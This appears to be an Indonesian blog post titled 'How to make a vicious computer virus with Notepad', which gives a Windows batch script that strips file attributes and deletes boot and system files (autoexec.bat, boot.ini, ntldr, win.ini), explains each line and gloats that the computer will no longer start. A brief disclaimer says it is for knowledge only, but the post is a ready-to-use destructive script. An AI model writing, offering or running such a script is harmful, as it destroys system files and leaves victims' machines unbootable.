Cara Bikin Virus Ganas Komputer Dengan NOTEPAD

Coba buat script di bawah ini :

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Simpan penggalan script diatas pada notepad anda, dan simpan dengan nama file apa aja, yang penting berformat *.bat

Fungsi Kode :
1. del c:\autoexec.bat  <-->  buat hapus autoexe.bat di direktori C
2. del c:\boot.ini  <-->  buat hapus Boot.ini di direktori C
3. del c:\ntldr  <-->  buat hapus ntldr
4. del c:\windows\win.ini  <-->  untuk hapus file win.ini yang berlokasi di C:/windows
5. attrib -r -s -h  <-->  untuk menampilkan file ke 4 windows tadi yang di supper hidden

Tanpa file autoexec.bat, boot.ini, ntldr, dan win.ini, Maka komputer yang bersistem operasikan windows tdk akan mau hidup... hahahahahaha
wew... yakin deh ga ada antivirus buat penawarnya kalau sudah terinfeksi. Tapi Hati-hati kalau tidak bisa mengembalikan seperti semula bisa-bisa di bunuh orang anda sob. hahaahhaha... :D :D :D

Warning !!!
Postingan ini hanya buat pengetahuan bukan untuk berbuat jahat.


Baca Juga Postingan Terkait Lainnya Sob :


0 Response to "Cara Bikin Virus Ganas Komputer Dengan NOTEPAD"

Poskan Komentar